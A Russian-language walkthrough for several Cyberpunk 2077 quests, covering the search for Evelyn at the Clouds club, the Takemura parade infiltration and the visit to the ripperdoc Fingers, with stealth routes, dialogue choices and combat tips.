  • Цель: отправиться к куклам, чтобы узнать информацию об Эвелин
  • Требуемые атрибуты: 8 уровень, 5 и 7 Техники, 5 Интеллекта, 5, 7 и 9 Силы
  • Награда: пистолет «Лиззи», перк и очко атрибутов.

После завершения ограбления и выживания Ви хочет увидеться с Эвелин. Позвоните Джуди и спросите, где Эвелин – она будет отвечать неохотно, будто больше не хочет иметь дел с Ви. Тогда Ви отправится в «Лиззис», где застанет Джуди за спором с руководительницей.

По дороге в клуб Джонни открыто выскажет все, что думает о куклах и Джуди. Он считает, что дело нечисто.

В «Облаках» вам предложат выбрать куклу и заплатить 500 долларов. Выбирайте: Ангел это кукла-мужчина, Скай – девушка. На самом деле, их диалоги почти не отличаются, так что выбор ни на что не повлияет. Сдавайте оружие и входите в выбранную кабинку.

Кукла будет проводить сеанс психоанализа, а не заниматься чем-то, о чем вы могли подумать. Вы можете сказать стоп-слово, чтобы прервать разговор и допросить куклу об Эвелин. За дополнительные 900 эдди вы узнаете, что произошло в кабинке 11. А без денег куклы подскажут, что за подробностями нужно обратиться к кукле по имени Том в VIP-зоне.

Нужно поговорить с Томом в VIP-зоне. Но в нее нельзя попасть без специального пропуска. Есть два варианта:

  • Если вы уже прокачались в танка и играете на низкой сложности, можете попробовать просто пробежать до двери Дубмана (понадобится 9 Силы, чтобы открыть дверь на пути). В таком случае Дубман будет агрессивным, как и все остальные охранники в здании, и его придется убить.
  • Украсть пропуск у охранника и пройти к Тому скрытно. Когда вы будете у двери, охранник будет спорить с клиентом, потерявшим карту. Дождитесь, пока второй охранник из VIP-зоны пойдет в уборную – там вы сможете его вырубить и спрятать в ящик у двери.
  • Украсть пропуск у другого сотрудника. Сбоку есть дверь, которую можно открыть Силой. Входите и скрытно продвигайтесь до первой двери – там слева будет коридор, в котором есть решетка с дырой. Если скрытно обезвредить находящегося там сотрудника клуба, то с его тела тоже можно забрать карту.

Если вы выбрали относительно мирный путь, поговорите с Томом. Он тоже не в курсе, куда пропала Эвелин. Остается поговорить с Дубманом. Поскольку у вас нет с собой оружия, рекомендуется скрытный вариант прохождения. Вы также можете отвлечь охранника у двери с надписью «No entry», пройти в нее и закрыть за собой – охранник перестанет следить.

Или пойти по стрелочкам – вариант обхода слева потребует скрытно устранить охранника на пути, а для обхода справа потребуется 9 Силы или 7 Техники. Так или иначе, добирайтесь до офиса Дубмана – он в центре карты справа на скриншоте. Дальней точкой отмечена комната Эвелин, можете заглянуть и в нее.

Доберитесь до Дубмана. Если вы никого не убили, то он будет разговаривать с вами. А если скрытность – не ваш вариант, то Дубмана тоже придется убить.

В первом случае спросите у него об Эвелин. Чтобы пройти без насилия, выбирайте такие ответы:

  • «Я ищу Эвелин Паркер»;
  • «Вы выглядите как разумный человек, давайте заключим сделку»;
  • «Я заплачу за информацию»;
  • «Хочу сделать пожертвование»;
  • «Давайте не будем усложнять ситуацию»;
  • «Так или иначе, я все выясню»;
  • «Давайте к делу»;
  • «Имя и адрес».

В диалоге могут появиться и другие варианты:

  • Рассказать Дубману, что случилось с Джотаро во второстепенном квесте «Охота на чудовище»;
  • Использовать угрозу «Арасакой», если играете за корпората;
  • Помочь решить проблему с нетраннером, если у вас 10 Интеллекта.

Дубман расскажет, что Эвелин больше не работает в «Облаках». Он даст контакты рипера Фингерса на Чпок-стрит. Не забудьте забрать свое снаряжение и поговорить с Джонни на обратном пути – его мнение о куклах изменилось, теперь он вообще их ненавидит.

В лифте у Ви случится сбой в работе микрочипа. Когда главный герой/героиня доползет до тихого места и присядет, можно поговорить с Джонни о произошедшем. Так начнется второстепенный квест «Метаморфозы» – не спешите ругаться с Джонни, если не хотите остаться без его личных квестов.

После разговора с Джонни можете отправляться на поиски Фингерса. Так начнется следующий квест «Тайные удовольствия».

Кукольный домик

Кукольный домикКукольный домик

Ви отправляет на поиски Эвелин в «Лиззис». От людей в клубе узнаем, что Эвелин был всего лишь куклой в чьих-то руках. Работала она в борделе «Облака». Отправляемся туда, чтобы добыть информацию.

Чтобы разузнать об Эвелин, нужно заплатить за сеанс Ангелу или Скаю и расспросить. Оказывается, Эвелин здесь сейчас нет. Нужно обследовать ВИП-комнату.

Допрос ДубманаДопрос Дубмана

Туда можно попасть во время происшествия в клубе. Один из клиентов поссорился с охранниками и когда те отвлекаются, нужно подняться на второй этаж. По желанию можно допросить всех присутствующих, но для продолжения задания нужен Дубман.

Конфликт с ним можно решить разными вариантами:

Вариант 1. Предложить деньги и разузнать всю информацию мирным путем.

Вариант 2. Убить Дубмана и прочесть всё нужное в его компьютере. Тогда в борделе поднимется тревога и придется прорываться боем через толпы охранников.

Когда здание будет покинуто, появится Джонни и предлагает разъединить разумы.

На мягких лапах

На мягких лапахНа мягких лапах

Встречаемся с сообщником в Джапан-тауне. Поднимаемся на крышу отмеченного здания и находим Такэмуру, который разговаривает с полицейскими. Он уже приобрел чип с вирусом для взлома системы движения парада. Но сразу его нужно проверить, и они отправляются в кабину охраны.

В комнату можно попасть силой (выбив дверь) или воспользоваться вентиляцией. Запускаем вирус и убеждаемся в его работоспособности. Отправляемся к ангару сами или в компании с Такэмурой.

Добраться до терминалаДобраться до терминала

Взбираемся на заброшенный завод и обследуем с помощью сканера территорию, в которую нужно в дальнейшем попасть.

Проникновение начинается под покровом ночи. Добраться до нужного ангара можно разными способами.

Вариант 1. Снова взбираемся на старый завод и бежим по крышам до нужного ангара. Загружаем вирус в сеть и с помощью Такэмуры сбегаем.

Вариант 2. Пробираемся через ворота, попутно устраняя врагов по стелсу и взламывая охранные системы. Загружаем вирус и сбегаем тем же путём или через крышу.

Распознавание образов

Распознавание образовРаспознавание образов

Подчиненные Пластида дают задание – проникнуть в старый торговый центр и украсть информацию с серверов. Попасть в сооружение можно вырубая врагов по стелсу или рваться на пролом. Когда Ви окажется внутри, то нужно будет отыскать нетраннера. Противник прячется в фургоне и будет закрывать все двери на пути.

Поднявшись на второй этаж, вас встретит Матильда К. Роуз. Она – боец ближнего боя с огромным молотом. В ближнем бою будет с ней тяжело, поэтому лучше наносить удары из далека. Когда она будет делать к вам рывок, то ставьте блок для сокращения урона.

Разговор с БрижиттРазговор с Брижитт

После победы над Роуз отправляемся в центральный зал. Там можно взломать терминал и использовать турели для борьбы с бандитами. В стоящем фургоне можно получить информацию о нетраннере.

Враг прячется в кинотеатре и добраться до него будет легко. Когда Ви встречает агента, тот рассказывает о заговоре вудуистов. Банда заразила Ви вирусом, и он погибнет по окончанию задания. Вне зависимости от выбранного стиля допроса, агент расскажет правду. Его можно пощадить или убить.

В конце миссии Ви теряет сознание, но чип Джонни воскрешает его. На улице будут ждать люди, и они сильно удивятся, когда увидят Ви живым. Огонь банда не откроет, а просто доставит к главарю.

Старые друзья

Старые друзьяСтарые друзья

С Ви свяжется Такэмура и назначит встречу. Бывший телохранитель позвал своего приятеля Оду, который сейчас оберегает дочь Сабуро Арасаки.

Ви и Такэмура рассказывают о произошедшем инциденте, когда Ёринобу убил своего отца. Они хотят встретиться с его сестрой. Ода не верит их словам и отказывается помогать.

Ода и ТакэмураОда и Такэмура

Подельники едут в машине и разговор заходит о параде в китайском районе. Они решают попасть на него и выловить Ханако для разговора. У фиксера Вакако получаем чип с данными проведения мероприятия и ждем звонка от Такэмуры.

Тайные удовольствия

Тайные удовольствияТайные удовольствия

Звоним Джуди и рассказываем ей всё что узнали в «Облаках». Она поблагодарит за помощь. Дальше нужно отправиться в отмеченную область на карте.

Там находим рипера Фингерса, который работает незаконно. К нему выстроилась целая очередь из девушек. Можно просто подождать пока они все разойдутся или применить разные уловки (подкупить, убедить).

Разговор с ФингерсомРазговор с Фингерсом

Когда Ви попадает к доктору, то начинается допрос. Фингерс ответит на все вопросы правдиво вне зависимости от того, как пройдет разговор (с применением грубой силы или лояльно). Джуди оценит, если Ви побьёт дока. Квест завершится, когда покинете здание и свяжетесь с подругой.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *